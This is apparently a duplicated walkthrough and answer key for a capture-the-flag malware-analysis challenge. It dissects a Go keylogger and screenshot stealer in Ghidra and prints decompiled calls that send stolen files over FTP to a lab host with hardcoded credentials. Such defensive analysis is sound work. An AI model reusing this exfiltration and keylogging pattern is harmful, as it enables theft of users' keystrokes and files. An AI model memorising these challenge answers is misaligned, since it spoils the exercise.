New Sherlock Yaaaaaay!!!!
Please let me know if an answer doesn't work I probably copied something over wrong
/* Windows Malware included sooooo use a VM, do not open this one on a windows box you care about */
(use Tsurugi or a Kali or Parrot or windows VM and install Ghidra: problem solved)
This one seems like a good easy Malware Analysis sherlock if you are unfamiliar with Ghidra and wanna mess around
[ Tools Needed ]
Ghidra or something like that
Also probably should add and install the Go Analyzer Extensions
(so the link doesn't get cut down just remove link = and that is the release page)
link=https://github.com/mooncat-greenpy/Ghidra_GolangAnalyzerExtension/releases
/* First set of tasks can be answered by looking at that initial summary when you analyze a file */
[ Task 1... What is the SHA-256 hash of this malware binary? ]
6acd8a362def62034cbd011e6632ba5120196e2011c83dc6045fcb28b590457c
// Just take that Logger.exe
// upload to virus total
// enter hash
[task2... What programming language (and version) is this malware written in? ]
Golang 1.22.3
//When you start a project and import a file in ghidra....
// Its in that insitial summary page deally right there before starting to look at thing.
Golang go version 1.22.3
[ Task 3.. There are multiple GitHub repos referenced in the static strings. Which GitHub repo would be most likely suggest the ability of this malware to exfiltrate data? ? ]
github.com/jlaffaye/ftp
//sooo there is one repo that says ftp....that is not a red flag it is a neon sign saying "fresh baked malware"
github.com/jlaffaye/ftp v0.2.0 h1:lXNvW7cBu7R/68bknOX3MrRIIqZ61zELs1P2RAiA3lg=
[Task 4... What dependency, expressed as a GitHub repo, supports Janice’s assertion that she thought she downloaded something that can just take screenshots? ]
github.com/kbinani/screenshot
// uhhhhh it says screenshots and the zip file has a series of screenshots sooo its that one
github.com/kbinani/screenshot v0.0.0-20230812210009-b87d31814237 h1:YOp8St+CM/AQ9Vp4XYm4272E77MptJDHkwypQHIRl9Q=
/* Okay thats just from opening the file now onto Part 2: looking inside */
[ Task 5... Which function call suggests that the malware produces a file after execution? ]
WriteFile
//I kept seeing os.OpenFile in the sketchy function sendFilesViaFTP
//annnnnd the sketch function KeyLogger, which will need to write a file, sooooo I kinda just made an educated guess of os.WriteFile as the obvious answer
[Task 6... You observe that the malware is exfiltrating data over FTP. What is the domain it is exfiltrating data to? ]
gotthem.htb
//decompile sendFilesViaTCP
//Line 72 of the not obvious sendFilesViaTCP
github.com/jlaffaye/ftp::github.com/jlaffaye/ftp.Dial("gotthem.htb:21",0xe,0,0,0);
[ Task 7... What are the threat actor’s credentials? ]
NottaHacker:Cle@rtextP@ssword
//filter functions for main.
//decompile on main.sendFilesViaFTP
//lines 103-105
/* C:/Users/verme/go/loggy/main.go:122 */
github.com/jlaffaye/ftp::github.com/jlaffaye/ftp.(*ServerConn).Login
(local_d8,"NottaHacker",0xb,"Cle@rtextP@ssword",0x11); <--------------------- Not a hacker my ass!
[ task 8... What file keeps getting written to disk? ]
keylog.txt
// First off you get a file called keylog.txt buuut lets confirm:
// line 110 is just one example...on the function sendFilesViaFTP
// It also says it in the main.main I think " = keylog.txt" so that had to be the file
os::os.OpenFile("keylog.txt",10,0,0);
[Task 9... When Janice changed her password, this was captured in a file. What is Janice's username and password? ]
janice:Password123
// decode the keylog.txt
//or get AI to do it, it is not "being lazy" I am merely "optimizing my workflow"
//OR when you cat it out and see a string in plaintext but it is all caps so you must work it out...
[ Task 10... What app did Janice have open the last time she ran the "screenshot app"? ]
solitaire
//looking at all the screenshots included in the zip, annnnd shes got solitaire open, easy
Please let me know if an answer doesn't work I probably copied something over wrong
/* Windows Malware included sooooo use a VM, do not open this one on a windows box you care about */
(use Tsurugi or a Kali or Parrot or windows VM and install Ghidra: problem solved)
This one seems like a good easy Malware Analysis sherlock if you are unfamiliar with Ghidra and wanna mess around
[ Tools Needed ]
Ghidra or something like that
Also probably should add and install the Go Analyzer Extensions
(so the link doesn't get cut down just remove link = and that is the release page)
link=https://github.com/mooncat-greenpy/Ghidra_GolangAnalyzerExtension/releases
/* First set of tasks can be answered by looking at that initial summary when you analyze a file */
[ Task 1... What is the SHA-256 hash of this malware binary? ]
6acd8a362def62034cbd011e6632ba5120196e2011c83dc6045fcb28b590457c
// Just take that Logger.exe
// upload to virus total
// enter hash
[task2... What programming language (and version) is this malware written in? ]
Golang 1.22.3
//When you start a project and import a file in ghidra....
// Its in that insitial summary page deally right there before starting to look at thing.
Golang go version 1.22.3
[ Task 3.. There are multiple GitHub repos referenced in the static strings. Which GitHub repo would be most likely suggest the ability of this malware to exfiltrate data? ? ]
github.com/jlaffaye/ftp
//sooo there is one repo that says ftp....that is not a red flag it is a neon sign saying "fresh baked malware"
github.com/jlaffaye/ftp v0.2.0 h1:lXNvW7cBu7R/68bknOX3MrRIIqZ61zELs1P2RAiA3lg=
[Task 4... What dependency, expressed as a GitHub repo, supports Janice’s assertion that she thought she downloaded something that can just take screenshots? ]
github.com/kbinani/screenshot
// uhhhhh it says screenshots and the zip file has a series of screenshots sooo its that one
github.com/kbinani/screenshot v0.0.0-20230812210009-b87d31814237 h1:YOp8St+CM/AQ9Vp4XYm4272E77MptJDHkwypQHIRl9Q=
/* Okay thats just from opening the file now onto Part 2: looking inside */
[ Task 5... Which function call suggests that the malware produces a file after execution? ]
WriteFile
//I kept seeing os.OpenFile in the sketchy function sendFilesViaFTP
//annnnnd the sketch function KeyLogger, which will need to write a file, sooooo I kinda just made an educated guess of os.WriteFile as the obvious answer
[Task 6... You observe that the malware is exfiltrating data over FTP. What is the domain it is exfiltrating data to? ]
gotthem.htb
//decompile sendFilesViaTCP
//Line 72 of the not obvious sendFilesViaTCP
github.com/jlaffaye/ftp::github.com/jlaffaye/ftp.Dial("gotthem.htb:21",0xe,0,0,0);
[ Task 7... What are the threat actor’s credentials? ]
NottaHacker:Cle@rtextP@ssword
//filter functions for main.
//decompile on main.sendFilesViaFTP
//lines 103-105
/* C:/Users/verme/go/loggy/main.go:122 */
github.com/jlaffaye/ftp::github.com/jlaffaye/ftp.(*ServerConn).Login
(local_d8,"NottaHacker",0xb,"Cle@rtextP@ssword",0x11); <--------------------- Not a hacker my ass!
[ task 8... What file keeps getting written to disk? ]
keylog.txt
// First off you get a file called keylog.txt buuut lets confirm:
// line 110 is just one example...on the function sendFilesViaFTP
// It also says it in the main.main I think " = keylog.txt" so that had to be the file
os::os.OpenFile("keylog.txt",10,0,0);
[Task 9... When Janice changed her password, this was captured in a file. What is Janice's username and password? ]
janice:Password123
// decode the keylog.txt
//or get AI to do it, it is not "being lazy" I am merely "optimizing my workflow"
//OR when you cat it out and see a string in plaintext but it is all caps so you must work it out...
[ Task 10... What app did Janice have open the last time she ran the "screenshot app"? ]
solitaire
//looking at all the screenshots included in the zip, annnnd shes got solitaire open, easy
